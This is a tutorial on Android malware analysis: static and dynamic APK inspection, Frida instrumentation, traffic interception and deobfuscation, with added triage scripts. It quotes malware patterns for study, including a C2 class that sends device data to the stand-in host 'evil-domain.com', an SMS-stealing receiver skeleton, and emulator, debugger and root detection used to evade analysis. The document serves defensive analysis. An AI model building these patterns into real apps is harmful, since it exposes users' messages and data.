Malware Analysis
android
malware-analysis
reverse-engineering
mobile-security

Android Malware Reverse Engineering: Complete APK Analysis Guide

Master Android malware analysis with this comprehensive guide covering static and dynamic analysis, APK unpacking, code deobfuscation, and threat attribution.

6 September 2025 · 13 min read · MetaCache Cybersecurity

TL;DR

Android malware analysis is critical for understanding mobile threats targeting India's massive smartphone ecosystem. This comprehensive guide covers:

  • Static Analysis: APK unpacking, manifest analysis, and code examination without execution
  • Dynamic Analysis: Runtime behavior monitoring, network traffic analysis, and sandbox techniques
  • Advanced Techniques: Code deobfuscation, anti-analysis bypass, and threat attribution
  • Tools & Environment: Complete toolkit setup for professional malware research

With over 600 million Android users in India and sophisticated threat actors like Sidewinder and Donot Team targeting the region, mastering these techniques is essential for cybersecurity professionals.


The Android Threat Landscape: Why Malware Analysis Matters

India's mobile-first economy has created the world's largest Android user base, making it an attractive target for cybercriminals and nation-state actors. Recent threat intelligence reveals sophisticated campaigns specifically targeting Indian users:

Banking Trojans: Advanced malware like Flubot and Cerberus targeting UPI applications and banking credentials. These trojans use accessibility services to overlay legitimate banking interfaces with credential harvesting screens.

Spyware Operations: APTs like Sidewinder deploying custom Android implants for surveillance of government officials, military personnel, and journalists. These campaigns often use legitimate-looking applications as delivery vectors.

SMS Fraud Networks: Malware families intercepting SMS OTPs and bank transaction confirmations, enabling real-time account takeovers during the critical authentication window.

Cryptocurrency Theft: Specialized malware targeting crypto wallet applications, exploiting the growing adoption of digital assets in India's tech-savvy population.

Understanding these threats requires systematic malware analysis capabilities. Unlike desktop malware, Android threats operate within the constraints of the Android security model, creating unique analysis challenges and opportunities.

Foundation: Understanding Android Application Architecture

Before diving into analysis techniques, it's crucial to understand the Android application structure:

APK File Structure

An Android Package (APK) is essentially a ZIP archive containing:

MyApp.apk
├── AndroidManifest.xml     # App permissions and components
├── classes.dex             # Compiled Java/Kotlin code
├── resources.arsc          # Compiled resources
├── res/                    # Application resources
│   ├── layout/             # UI layouts
│   ├── drawable/           # Images and graphics
│   └── values/             # Strings, colors, dimensions
├── assets/                 # Raw application assets
├── lib/                    # Native libraries (ARM, x86)
│   ├── arm64-v8a/
│   ├── armeabi-v7a/
│   └── x86/
└── META-INF/               # v1 (JAR) signature; v2/v3 signatures live in the APK Signing Block, outside the ZIP entries
    ├── MANIFEST.MF
    ├── CERT.SF
    └── CERT.RSA

[Figure: Detailed view of Android APK internal structure showing all components]

Dalvik Executable (DEX) Format

Android applications are compiled to Dalvik bytecode, stored in .dex files. The bytecode is executed by the Android Runtime (ART), which compiles it ahead of time or just in time, and a DEX file contains:

  • Class definitions and method implementations
  • String constants and resource references
  • Application control flow and business logic
  • Obfuscated or encrypted payloads in malware

Android Security Model

The Android security model provides several layers that malware must circumvent:

  • Application Sandboxing: Each app runs in its own process under a unique Linux UID, so reading another app's data needs a privileged path (root, an accessibility service, or a platform bug)
  • Permission System: Explicit user consent is required for dangerous permissions at runtime (API 23+), which is why malware invests in social engineering and accessibility abuse to get them granted
  • Code Signing: Applications must be cryptographically signed, but with the developer's own key; a valid signature proves update continuity, not trustworthiness
  • Bytecode Verification: ART verifies DEX classes before they run, so even a payload decrypted and loaded at runtime must be well-formed DEX (which is what makes memory carving of such payloads productive)

Static Analysis: Dissecting APK Files Without Execution

Static analysis examines the malware without executing it, providing insights into capabilities, infrastructure, and potential impact.

[Figure: Complete malware analysis workflow from initial triage to threat attribution]

Environment Setup

First, establish a proper analysis environment:

# Install essential tools (strings comes from binutils and hexdump from bsdextrautils
# on current Debian/Ubuntu; aapt is needed for the manifest dumps below)
sudo apt update && sudo apt install -y \
    openjdk-17-jdk \
    python3-pip \
    git \
    unzip \
    file \
    binutils \
    bsdextrautils \
    aapt

# Install apktool. GitHub's "latest" redirect needs the exact asset name, so a wildcard
# will not download anything; pin a version and check the releases page for the current one.
wget https://github.com/iBotPeaches/Apktool/releases/download/v2.9.3/apktool_2.9.3.jar -O apktool.jar

# Install dex2jar for DEX to JAR conversion
wget https://github.com/pxb1988/dex2jar/releases/download/v2.4/dex-tools-v2.4.zip
unzip dex-tools-v2.4.zip && chmod +x dex-tools-v2.4/*.sh

# Install jadx for decompilation (pinned for the same reason)
wget https://github.com/skylot/jadx/releases/download/v1.5.0/jadx-1.5.0.zip
unzip jadx-1.5.0.zip -d jadx/
export PATH="$PWD/jadx/bin:$PWD/dex-tools-v2.4:$PATH"

Initial Triage and Metadata Analysis

Begin analysis with basic file inspection:

# Basic file information
file malware.apk
sha256sum malware.apk

# Extract APK contents. An APK is a ZIP, so running strings on the archive itself
# mostly returns compressed noise; run it on the extracted classes.dex instead.
unzip malware.apk -d extracted/
ls -la extracted/
strings -n 8 extracted/classes.dex | head -50

# Analyze AndroidManifest.xml (inside an APK it is binary XML, so cat/less show garbage)
aapt dump badging malware.apk            # package name, versions, SDK levels, launchable activity
aapt dump xmltree malware.apk AndroidManifest.xml

# Or use apktool, which decodes the manifest and resources to readable XML
java -jar apktool.jar d malware.apk -o decompiled/

Manifest Analysis: Understanding Permissions and Components

The AndroidManifest.xml reveals critical information about malware capabilities:

<!-- Dangerous permissions indicating potential malware -->
<uses-permission android:name="android.permission.SEND_SMS" />
<uses-permission android:name="android.permission.READ_SMS" />
<uses-permission android:name="android.permission.RECEIVE_SMS" />
<uses-permission android:name="android.permission.READ_CONTACTS" />
<uses-permission android:name="android.permission.ACCESS_FINE_LOCATION" />
<uses-permission android:name="android.permission.RECORD_AUDIO" />
<uses-permission android:name="android.permission.CAMERA" />
<uses-permission android:name="android.permission.SYSTEM_ALERT_WINDOW" />
<uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED" />

<!-- Services running in background -->
<service android:name=".BackgroundService"
         android:enabled="true"
         android:exported="false" />

<!-- Accessibility service. BIND_ACCESSIBILITY_SERVICE is declared on the service
     itself, not as a uses-permission; malware kits often list it there anyway,
     where it has no effect but is a useful tell. -->
<service android:name=".OverlayService"
         android:permission="android.permission.BIND_ACCESSIBILITY_SERVICE">
    <intent-filter>
        <action android:name="android.accessibilityservice.AccessibilityService" />
    </intent-filter>
</service>

<!-- Device admin. There is no DEVICE_ADMIN uses-permission: admin rights come from
     a receiver protected by BIND_DEVICE_ADMIN plus a device_admin policy resource. -->
<receiver android:name=".AdminReceiver"
          android:permission="android.permission.BIND_DEVICE_ADMIN">
    <meta-data android:name="android.app.device_admin"
               android:resource="@xml/device_admin" />
    <intent-filter>
        <action android:name="android.app.action.DEVICE_ADMIN_ENABLED" />
    </intent-filter>
</receiver>

<!-- Broadcast receiver for persistence (only fires with RECEIVE_BOOT_COMPLETED above) -->
<receiver android:name=".BootReceiver">
    <intent-filter android:priority="1000">
        <action android:name="android.intent.action.BOOT_COMPLETED" />
    </intent-filter>
</receiver>

Red Flags to Look For:

  • Excessive permissions not justified by app functionality
  • Accessibility service bindings (often used for overlay attacks)
  • Device admin requests (for persistence and anti-removal)
  • Boot receivers (automatic startup after reboot)
  • Hidden or obfuscated component names
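The red-flag checklist above is mechanical enough to script. The following is an added example (not code from the original article) that runs those checks over the plain-XML AndroidManifest.xml that apktool writes into its output directory: it collects dangerous permissions, finds accessibility services and device-admin receivers by the permission that protects them, finds boot receivers by action, lists components that are exported (explicitly or by the pre-Android 12 intent-filter default), and applies a crude obfuscated-name heuristic. The manifest embedded at the bottom is constructed for the demonstration; the package name and component names in it are invented.

```python
"""Added example: triage an apktool-decoded AndroidManifest.xml for the red flags above."""
import xml.etree.ElementTree as ET

ANDROID_NS = "http://schemas.android.com/apk/res/android"
DANGEROUS = {
    "android.permission.SEND_SMS", "android.permission.READ_SMS",
    "android.permission.RECEIVE_SMS", "android.permission.READ_CONTACTS",
    "android.permission.ACCESS_FINE_LOCATION", "android.permission.RECORD_AUDIO",
    "android.permission.CAMERA", "android.permission.SYSTEM_ALERT_WINDOW",
    "android.permission.REQUEST_INSTALL_PACKAGES", "android.permission.READ_PHONE_STATE",
}
BIND_ACCESSIBILITY = "android.permission.BIND_ACCESSIBILITY_SERVICE"
BIND_DEVICE_ADMIN = "android.permission.BIND_DEVICE_ADMIN"
BOOT_COMPLETED = "android.intent.action.BOOT_COMPLETED"
COMPONENTS = ("activity", "service", "receiver", "provider")


def attr(elem, name):
    """Read an android:-namespaced attribute such as android:name."""
    return elem.get("{%s}%s" % (ANDROID_NS, name))


def triage_manifest(xml_text):
    root = ET.fromstring(xml_text)
    perms = {attr(p, "name") for p in root.iter("uses-permission")}
    out = {"package": root.get("package"), "dangerous_permissions": sorted(perms & DANGEROUS),
           "accessibility_services": [], "device_admin_receivers": [], "boot_receivers": [],
           "exported_components": [], "red_flags": []}
    app = root.find("application")
    for comp in (app if app is not None else []):
        if comp.tag not in COMPONENTS:
            continue
        name = attr(comp, "name") or "?"
        actions = {attr(a, "name") for a in comp.iter("action")}
        perm = attr(comp, "permission")
        if comp.tag == "service" and perm == BIND_ACCESSIBILITY:
            out["accessibility_services"].append(name)
        if comp.tag == "receiver" and perm == BIND_DEVICE_ADMIN:
            out["device_admin_receivers"].append(name)
        if BOOT_COMPLETED in actions:
            out["boot_receivers"].append(name)
        # Before Android 12 a component with an intent-filter is exported unless it opts out
        exported = attr(comp, "exported")
        if exported == "true" or (exported is None and actions):
            out["exported_components"].append(name)
        if len(name.rsplit(".", 1)[-1]) <= 2:   # heuristic: ".a", "x.y.b" (ProGuard does this too)
            out["red_flags"].append("obfuscated component name: " + name)
    sms = perms & {"android.permission.RECEIVE_SMS", "android.permission.READ_SMS"}
    if sms:
        out["red_flags"].append("SMS interception: " + ", ".join(sorted(sms)))
    if out["accessibility_services"] and "android.permission.SYSTEM_ALERT_WINDOW" in perms:
        out["red_flags"].append("overlay kit: accessibility service + SYSTEM_ALERT_WINDOW")
    if BIND_ACCESSIBILITY in perms:
        out["red_flags"].append("BIND_ACCESSIBILITY_SERVICE as uses-permission (no effect; a kit tell)")
    if out["device_admin_receivers"]:
        out["red_flags"].append("device admin receiver (anti-removal persistence)")
    if out["boot_receivers"]:
        has_perm = "android.permission.RECEIVE_BOOT_COMPLETED" in perms
        out["red_flags"].append("boot receiver (auto-start)" if has_perm
                                else "BOOT_COMPLETED receiver without RECEIVE_BOOT_COMPLETED (will not fire)")
    return out


# Constructed manifest in apktool's decoded form (not a real sample)
SAMPLE_MANIFEST = """<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.example.upihelper">
    <uses-permission android:name="android.permission.INTERNET"/>
    <uses-permission android:name="android.permission.SEND_SMS"/>
    <uses-permission android:name="android.permission.RECEIVE_SMS"/>
    <uses-permission android:name="android.permission.READ_SMS"/>
    <uses-permission android:name="android.permission.SYSTEM_ALERT_WINDOW"/>
    <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED"/>
    <uses-permission android:name="android.permission.BIND_ACCESSIBILITY_SERVICE"/>
    <application android:label="UPI Helper">
        <activity android:name=".MainActivity">
            <intent-filter><action android:name="android.intent.action.MAIN"/></intent-filter>
        </activity>
        <service android:name=".BackgroundService" android:exported="false"/>
        <service android:name=".OverlayService"
                 android:permission="android.permission.BIND_ACCESSIBILITY_SERVICE">
            <intent-filter><action android:name="android.accessibilityservice.AccessibilityService"/></intent-filter>
        </service>
        <receiver android:name=".AdminReceiver" android:permission="android.permission.BIND_DEVICE_ADMIN">
            <intent-filter><action android:name="android.app.action.DEVICE_ADMIN_ENABLED"/></intent-filter>
        </receiver>
        <receiver android:name=".BootReceiver">
            <intent-filter android:priority="1000"><action android:name="android.intent.action.BOOT_COMPLETED"/></intent-filter>
        </receiver>
        <receiver android:name="com.example.upihelper.a"/>
    </application>
</manifest>"""

if __name__ == "__main__":
    import json
    print(json.dumps(triage_manifest(SAMPLE_MANIFEST), indent=2))
```

Point it at decompiled/AndroidManifest.xml from the apktool step to run it on a real sample. The exported-by-default rule is deliberately the lenient pre-Android 12 one, because that is the behaviour on the older devices most banking trojans target.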

Code Decompilation and Analysis

Convert DEX bytecode back to readable Java source:

# Method 1: Using dex2jar + JD-GUI
d2j-dex2jar.sh malware.apk
# This creates malware-dex2jar.jar
# Open in JD-GUI for viewing

# Method 2: Using jadx (recommended)
jadx malware.apk -d jadx_output/
# Creates human-readable source code

# Method 3: Using apktool for smali disassembly
java -jar apktool.jar d malware.apk -o smali_output/

[Figure: JADX GUI showing decompiled Android malware source code]

Identifying Malicious Patterns

Look for common malware indicators in the decompiled code:

Command and Control (C2) Communication:

public class NetworkManager {
    private static final String C2_URL = "http://evil-domain.com/api";

    private void sendDeviceInfo() {
        HttpURLConnection conn = (HttpURLConnection) new URL(C2_URL).openConnection();
        // Data exfiltration code
    }
}

SMS Interception:

public class SmsReceiver extends BroadcastReceiver {
    @Override
    public void onReceive(Context context, Intent intent) {
        if ("android.provider.Telephony.SMS_RECEIVED".equals(intent.getAction())) {
            Bundle bundle = intent.getExtras();
            // SMS stealing logic
        }
    }
}

Root Detection (a check, not a bypass: malware uses it to behave differently on rooted analysis devices):

private boolean isDeviceRooted() {
    String[] rootPaths = {"/system/app/Superuser.apk", "/system/xbin/su"};
    for (String path : rootPaths) {
        if (new File(path).exists()) return true;
    }
    return false;
}

Cryptographic Analysis

Examine encryption/obfuscation mechanisms:

# Search for cryptographic constants (on the extracted DEX, not the compressed APK)
strings -n 8 extracted/classes.dex | grep -E '([A-Fa-f0-9]{32,}|-----BEGIN)'

# Look for base64 encoded strings
strings -n 20 extracted/classes.dex | grep -E '^[A-Za-z0-9+/=]{20,}$'

# Check for packed/encrypted DEX files. Hexdumping the compressed archive for "dex"
# finds nothing; instead let file identify DEX by its magic anywhere in the extracted tree.
# A "Dalvik dex file" outside the root (for example under assets/) is a secondary payload.
find extracted/ -type f -exec file {} + | grep -i 'dalvik'

Dynamic Analysis: Runtime Behavior Monitoring

Dynamic analysis observes malware behavior during execution, revealing capabilities not apparent from static analysis.

Sandbox Environment Setup

Create an isolated analysis environment:

# Android emulator setup (sdkmanager/avdmanager from the SDK cmdline-tools; the old
# "android create avd" command no longer exists). Use a google_apis image, not a
# google_play one: Play images refuse "adb root", which the capture steps below rely on.
sdkmanager "platform-tools" "emulator" "system-images;android-30;google_apis;x86_64"
avdmanager create avd -n analysis_env -k "system-images;android-30;google_apis;x86_64"

# Start emulator with a clean state, routing HTTP(S) through the intercepting proxy;
# -writable-system is needed later to install the proxy CA as a system certificate
emulator -avd analysis_env -no-snapshot -wipe-data -writable-system \
         -http-proxy 127.0.0.1:8080
adb root

# Alternative: Genymotion with custom ROM
# Provides better performance and root access

Essential Analysis Tools:

  • Frida: Dynamic instrumentation framework
  • Burp Suite: HTTP proxy for network analysis
  • Wireshark: Network traffic capture
  • ADB: Android Debug Bridge for device interaction
  • Xposed Framework: Runtime modification (rooted devices only)

[Figure: Dynamic analysis environment with Frida and Burp Suite configured]

Network Traffic Analysis

Monitor and analyze malware network communications:

# Set up traffic interception: the emulator was started with -http-proxy pointing at
# Burp on 127.0.0.1:8080, so plain HTTP is already visible

# Install the Burp CA as a *system* CA. Since Android 7, apps ignore user-installed CAs
# unless their network_security_config opts in, so Settings > Install from storage alone
# leaves most HTTPS opaque. Export the CA from Burp in DER format first.
openssl x509 -inform DER -in burp_ca.der -out burp_ca.pem
cp burp_ca.pem "$(openssl x509 -subject_hash_old -noout -in burp_ca.pem).0"
adb root && adb remount            # google_apis image started with -writable-system
adb push *.0 /system/etc/security/cacerts/
adb shell chmod 644 /system/etc/security/cacerts/*.0
adb reboot
# (Android 14+ keeps system CAs inside the conscrypt APEX instead; stay on the API 30 image above)

# Capture traffic on the device. tcpdump is not on stock images, so push a static build;
# the emulator's interface is eth0 or radio0 rather than wlan0, hence -i any. After
# "adb root" the emulator shell is already root; on a rooted phone wrap commands in su -c.
adb push tcpdump /data/local/tmp/ && adb shell chmod 755 /data/local/tmp/tcpdump
adb shell "/data/local/tmp/tcpdump -i any port 53 -w /sdcard/dns.pcap"   # DNS only
adb shell "/data/local/tmp/tcpdump -i any -w /sdcard/traffic.pcap"       # everything
adb pull /sdcard/traffic.pcap

Analysis Focus Areas:

  • C2 server communication patterns (beacon interval, fixed-size requests, unusual User-Agent)
  • Data exfiltration methods and frequency
  • Domain generation algorithms (DGA)
  • Protocol encryption and obfuscation
  • Certificate pinning in the sample, which you must defeat (typically with a Frida hook) before Burp sees plaintext
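The first two focus areas are easy to check once the capture is exported as one line per request. Below is an added example (not from the original article) that groups HTTP flow records by destination host, measures how regular the inter-request gaps are (standard deviation divided by mean), and flags hosts that are contacted on a near-fixed schedule with identical-size POST bodies, which is what a credential uploader looks like in a capture. The flow records are constructed for the demonstration; the C2 host name is the fictional one used in the case study later on this page.

```python
"""Added example: flag periodic (beaconing) C2 traffic and fixed-size uploads in HTTP flow
records such as a Burp history or Zeek http.log export."""
from datetime import datetime
import statistics

# Constructed sample: "timestamp host method uri bytes_out" per line. The C2 host is hit
# roughly every 60 s with an identical 812-byte POST; the CDN requests are irregular.
SAMPLE_FLOWS = """\
2025-09-06T10:00:00 upi-secure-api.com POST /api/upload 812
2025-09-06T10:00:04 cdn.example.net GET /img/logo.png 0
2025-09-06T10:01:01 upi-secure-api.com POST /api/upload 812
2025-09-06T10:01:59 upi-secure-api.com POST /api/upload 812
2025-09-06T10:02:20 cdn.example.net GET /js/app.js 0
2025-09-06T10:03:00 upi-secure-api.com POST /api/upload 812
2025-09-06T10:04:02 upi-secure-api.com POST /api/upload 812
2025-09-06T10:04:45 cdn.example.net GET /img/banner.png 0
2025-09-06T10:04:58 upi-secure-api.com POST /api/upload 812
2025-09-06T10:05:02 cdn.example.net GET /css/site.css 0
2025-09-06T10:06:00 upi-secure-api.com POST /api/upload 812
"""


def parse_flows(text):
    flows = []
    for line in text.splitlines():
        ts, host, method, uri, size = line.split()
        flows.append({"ts": datetime.fromisoformat(ts), "host": host,
                      "method": method, "uri": uri, "bytes_out": int(size)})
    return flows


def find_beacons(flows, min_count=5, max_jitter=0.2):
    """Report hosts whose inter-request gaps have a coefficient of variation (stdev/mean)
    below max_jitter. Real C2 often adds random sleep, so widen max_jitter and capture
    longer rather than trusting a single short window."""
    by_host = {}
    for f in sorted(flows, key=lambda f: f["ts"]):
        by_host.setdefault(f["host"], []).append(f)
    report = {}
    for host, reqs in by_host.items():
        if len(reqs) < min_count:
            continue
        gaps = [(b["ts"] - a["ts"]).total_seconds() for a, b in zip(reqs, reqs[1:])]
        mean = statistics.mean(gaps)
        jitter = statistics.pstdev(gaps) / mean if mean else float("inf")
        if jitter <= max_jitter:
            sizes = {r["bytes_out"] for r in reqs}
            report[host] = {"count": len(reqs), "mean_interval": round(mean, 1),
                            "jitter": round(jitter, 3),
                            "fixed_size": len(sizes) == 1 and reqs[0]["method"] == "POST",
                            "uris": sorted({r["uri"] for r in reqs})}
    return report


if __name__ == "__main__":
    for host, stats in find_beacons(parse_flows(SAMPLE_FLOWS)).items():
        print(host, stats)
```

A sample that exfiltrates once every 24 hours, as in the case study, needs a capture that spans several days before this test has enough points; for those, the fixed request size and URI are the earlier tell.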

System-Level Monitoring

Track malware impact on the Android system:

# Monitor system calls. strace ships on google_apis emulator images. $(pidof ...) has to
# run on the device, so single-quote the whole command; after "adb root" the emulator
# shell is already root (on a rooted phone wrap each command in su -c '...').
adb shell 'strace -f -p $(pidof com.malware.package) -o /sdcard/syscalls.log'

# Track file system changes (inotifywait is not shipped on Android: snapshot and diff)
adb shell 'find /data/data/com.malware.package -type f -exec ls -l {} +' > files_before.txt
# ... exercise the sample ...
adb shell 'find /data/data/com.malware.package -type f -exec ls -l {} +' > files_after.txt
diff files_before.txt files_after.txt

# Monitor process creation (toybox ps takes -A, not aux)
adb shell 'while true; do ps -A | grep com.malware; sleep 1; done'

# Database monitoring (for credential theft); sqlite3 exists on emulator/userdebug images only
adb shell 'for db in /data/data/com.malware.package/databases/*.db; do echo "== $db"; sqlite3 "$db" .dump; done'

Frida-Based Dynamic Analysis

Use Frida for real-time code instrumentation:

// frida_script.js - Monitor crypto operations and outbound HTTP
Java.perform(function () {
    var Cipher = Java.use("javax.crypto.Cipher");
    var Arrays = Java.use("java.util.Arrays");

    // Both hooked methods have several overloads, so pick one explicitly:
    // Frida refuses to set .implementation on an ambiguous overload set.
    Cipher.doFinal.overload("[B").implementation = function (input) {
        console.log("[+] Cipher.doFinal (" + this.getAlgorithm() + ")");
        console.log("    Input : " + Arrays.toString.overload("[B")(input));

        var result = this.doFinal.overload("[B").call(this, input);
        console.log("    Output: " + Arrays.toString.overload("[B")(result));
        return result;
    };

    // Monitor URL connections
    var URL = Java.use("java.net.URL");
    URL.openConnection.overload().implementation = function () {
        console.log("[+] HTTP connection to: " + this.toString());
        return this.openConnection.overload().call(this);
    };
});

# Run Frida script: spawn the app with the hooks in place (frida-server must be
# running as root on the device). Frida 16+ resumes the spawned process on its own
# and no longer accepts --no-pause; on older releases add --no-pause.
frida -U -f com.malware.package -l frida_script.js

Advanced Analysis Techniques

Anti-Analysis Evasion

Modern malware employs various anti-analysis techniques:

Emulator Detection:

private boolean isEmulator() {
    return Build.MODEL.contains("google_sdk") ||
           Build.MODEL.contains("Emulator") ||
           Build.MANUFACTURER.contains("Genymotion");
}

Debugger Detection:

private boolean isDebugged() {
    // FLAG_DEBUGGABLE only says the build is debuggable; isDebuggerConnected()
    // is the check for a debugger actually attached at runtime
    return (getApplicationInfo().flags & ApplicationInfo.FLAG_DEBUGGABLE) != 0
            || android.os.Debug.isDebuggerConnected();
}

Root/Hook Detection:

private boolean hasXposed() {
    try {
        throw new Exception();
    } catch (Exception e) {
        for (StackTraceElement element : e.getStackTrace()) {
            if (element.getClassName().contains("xposed")) return true;
        }
    }
    return false;
}

Code Obfuscation and Packing

String Decryption

Malware often encrypts strings to hide indicators:

public class StringDecryptor {
    // Typical scheme: Base64-decode, then XOR with a short repeating key
    private static String decrypt(String encrypted, String key) {
        byte[] data = android.util.Base64.decode(encrypted, android.util.Base64.DEFAULT);
        byte[] keyBytes = key.getBytes(java.nio.charset.StandardCharsets.UTF_8);
        byte[] decryptedData = new byte[data.length];
        for (int i = 0; i < data.length; i++) {
            decryptedData[i] = (byte) (data[i] ^ keyBytes[i % keyBytes.length]);
        }
        return new String(decryptedData, java.nio.charset.StandardCharsets.UTF_8);
    }
}

Analysis Approach:

# Find the decryption routine and every call site in the decompiled code
grep -rn "decrypt\|decode\|deobfuscate" jadx_output/sources/

# Then either re-implement the routine offline and decrypt every call-site literal,
# or hook the routine with Frida and log each (encrypted, decrypted) pair at runtime
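Once the routine is understood, the offline route is a short script that rewrites the decompiled source with the plaintext literals, so the rest of the review reads like normal code. The following added example (not from the original article) assumes the Base64-plus-repeating-XOR scheme sketched above and a call-site shape of StringDecryptor.decrypt("<base64>", "<key>") as jadx would print it; the Java excerpt it operates on is constructed here, with its literals encrypted under an invented key.

```python
"""Added example: bulk-decrypt obfuscated string literals in jadx output once the
decryption routine has been reverse engineered (assumed: Base64 + repeating XOR)."""
import base64
import re


def xor_decrypt(encoded, key):
    """Inverse of the assumed StringDecryptor.decrypt scheme."""
    data = base64.b64decode(encoded)
    k = key.encode()
    return bytes(b ^ k[i % len(k)] for i, b in enumerate(data)).decode("utf-8", "replace")


def xor_encrypt(plain, key):
    """Used only to build the constructed sample below (XOR is symmetric)."""
    k = key.encode()
    raw = bytes(b ^ k[i % len(k)] for i, b in enumerate(plain.encode()))
    return base64.b64encode(raw).decode()


# Call sites as jadx prints them; change the class/method name to match the sample
CALL_SITE = re.compile(r'StringDecryptor\.decrypt\("([A-Za-z0-9+/=]+)",\s*"([^"]*)"\)')


def deobfuscate_source(java_src):
    """Replace every decrypt(...) call with its plaintext literal.
    Returns (rewritten_source, {ciphertext: plaintext})."""
    mapping = {}

    def replace(m):
        plain = xor_decrypt(m.group(1), m.group(2))
        mapping[m.group(1)] = plain
        return '"' + plain.replace("\\", "\\\\").replace('"', '\\"') + '"'

    return CALL_SITE.sub(replace, java_src), mapping


IOC_RE = re.compile(r"https?://[^\s\"']+|\b[a-z0-9.-]+\.(?:com|net|org|in)\b|\b(?:com|net|in)\.[a-z0-9.]+")


def extract_iocs(mapping):
    """URLs, domains and package names surfaced by decryption, for the IOC report."""
    return sorted({m.group(0) for plain in mapping.values() for m in IOC_RE.finditer(plain)})


# Constructed jadx-style excerpt: literals encrypted with the scheme above under a made-up key
KEY = "k3y!"
SAMPLE_SOURCE = """public class NetworkManager {
    private static final String C2_URL = StringDecryptor.decrypt("%s", "%s");
    private static final String TARGET = StringDecryptor.decrypt("%s", "%s");
    private static final String UA = StringDecryptor.decrypt("%s", "%s");
}
""" % (xor_encrypt("http://evil-domain.com/api", KEY), KEY,
       xor_encrypt("com.phonepe.app", KEY), KEY,
       xor_encrypt("Mozilla/5.0 (Linux; Android 11)", KEY), KEY)

if __name__ == "__main__":
    src, found = deobfuscate_source(SAMPLE_SOURCE)
    print(src)
    print("IOCs:", extract_iocs(found))
```

Run it over every file under jadx_output/sources/ and keep the mapping: the ciphertexts themselves are stable across builds of the same kit and make good YARA strings.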

DEX Packing Analysis

Advanced malware may pack or encrypt the main DEX payload:

# Check for multiple DEX files (classes2.dex, classes3.dex ... at the root are ordinary
# multidex; DEX files under assets/ or with innocent-looking names are not)
unzip -l malware.apk | grep -i "\.dex"

# Look for custom class loaders
grep -rn "DexClassLoader\|PathClassLoader\|InMemoryDexClassLoader" jadx_output/sources/

# Analyze assets for hidden DEX files: file reports "Dalvik dex file" for a bare DEX;
# an encrypted payload shows up as plain "data" with near-maximal entropy
file extracted/assets/*
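Both the cryptographic-analysis checks earlier and the packing checks above come down to the same two questions: which archive entries are really DEX files, whatever they are called, and which opaque blobs look encrypted. The following added example (not code from the original article) answers both in one pass: it walks the APK with zipfile, recognises DEX by its header rather than its name, decodes the 0x70-byte header and verifies the adler32 and SHA-1 fields that ART checks, and scores every entry's byte entropy so that an encrypted asset stands out. The APK it runs on is constructed in memory with a minimal valid DEX, the same DEX hidden under assets/ with an innocent name, and pseudo-random bytes standing in for ciphertext; none of it is a real sample.

```python
"""Added example: walk an APK, identify every DEX by its header (not its file name),
verify DEX header integrity and flag high-entropy blobs that may be encrypted payloads."""
import hashlib
import io
import math
import struct
import zipfile
import zlib
from collections import Counter

DEX_MAGIC = b"dex\n"
DEX_HEADER = struct.Struct("<8sI20s20I")        # 0x70 bytes: magic, adler32, sha1, 20 u4 fields
FIELDS = ["file_size", "header_size", "endian_tag", "link_size", "link_off", "map_off",
          "string_ids_size", "string_ids_off", "type_ids_size", "type_ids_off",
          "proto_ids_size", "proto_ids_off", "field_ids_size", "field_ids_off",
          "method_ids_size", "method_ids_off", "class_defs_size", "class_defs_off",
          "data_size", "data_off"]
KNOWN_MAGIC = (b"\x89PNG", b"\xff\xd8\xff", b"PK\x03\x04", b"\x1f\x8b", b"\x7fELF")


def parse_dex_header(data):
    """Decode the DEX header; None if the blob is not a DEX."""
    if len(data) < DEX_HEADER.size or not data.startswith(DEX_MAGIC):
        return None
    magic, checksum, signature, *values = DEX_HEADER.unpack_from(data)
    hdr = dict(zip(FIELDS, values))
    hdr["version"] = magic[4:7].decode()
    # adler32 covers everything after the checksum field, SHA-1 everything after the signature
    hdr["checksum_ok"] = (zlib.adler32(data[12:]) & 0xFFFFFFFF) == checksum
    hdr["signature_ok"] = hashlib.sha1(data[32:]).digest() == signature
    hdr["size_ok"] = hdr["file_size"] == len(data)
    return hdr


def entropy(data):
    """Shannon entropy in bits per byte: ciphertext and compressed data sit near 8."""
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values()) if n else 0.0


def triage_apk(apk):
    """apk: path or file-like object. Returns one finding dict per archive entry."""
    findings = []
    with zipfile.ZipFile(apk) as z:
        for info in z.infolist():
            if info.is_dir():
                continue
            data = z.read(info)
            f = {"name": info.filename, "size": len(data), "notes": [],
                 "sha256": hashlib.sha256(data).hexdigest(), "entropy": round(entropy(data), 2)}
            hdr = parse_dex_header(data)
            if hdr:
                f["dex"] = hdr
                if not (info.filename.startswith("classes") and info.filename.endswith(".dex")):
                    f["notes"].append("DEX outside the archive root: likely runtime-loaded payload")
                if not (hdr["checksum_ok"] and hdr["signature_ok"] and hdr["size_ok"]):
                    f["notes"].append("DEX header integrity mismatch: patched or truncated")
            elif (info.filename.startswith("assets/") and f["entropy"] > 7.5
                  and not data.startswith(KNOWN_MAGIC)):
                f["notes"].append("high-entropy asset: possibly encrypted/packed payload")
            findings.append(f)
    return findings


def build_fake_dex(payload=b"\x00" * 64):
    """Constructed minimal DEX (valid header, empty tables) for the demo; not a real sample."""
    fields = [DEX_HEADER.size + len(payload), 0x70, 0x12345678] + [0] * 17
    fields[18], fields[19] = len(payload), 0x70          # data_size, data_off
    tail = struct.pack("<20I", *fields) + payload
    sig = hashlib.sha1(tail).digest()
    chk = zlib.adler32(sig + tail) & 0xFFFFFFFF
    return DEX_MAGIC + b"035\0" + struct.pack("<I", chk) + sig + tail


def build_sample_apk():
    """Constructed in-memory APK: a normal classes.dex, a DEX hidden under assets/ with an
    innocent name, and an 'encrypted' blob (hash output stands in for ciphertext)."""
    noise = b"".join(hashlib.sha256(bytes([i])).digest() for i in range(256))
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("AndroidManifest.xml", b"\x03\x00\x08\x00" + b"\x00" * 60)
        z.writestr("classes.dex", build_fake_dex())
        z.writestr("assets/fonts.dat", build_fake_dex(b"\x11" * 128))
        z.writestr("assets/config.enc", noise)
        z.writestr("res/raw/notes.txt", b"UPI Helper release notes\n" * 20)
    buf.seek(0)
    return buf


if __name__ == "__main__":
    for f in triage_apk(build_sample_apk()):
        print("%-24s %6d bytes  H=%.2f  %s" % (f["name"], f["size"], f["entropy"],
                                               " | ".join(f["notes"]) or "-"))
```

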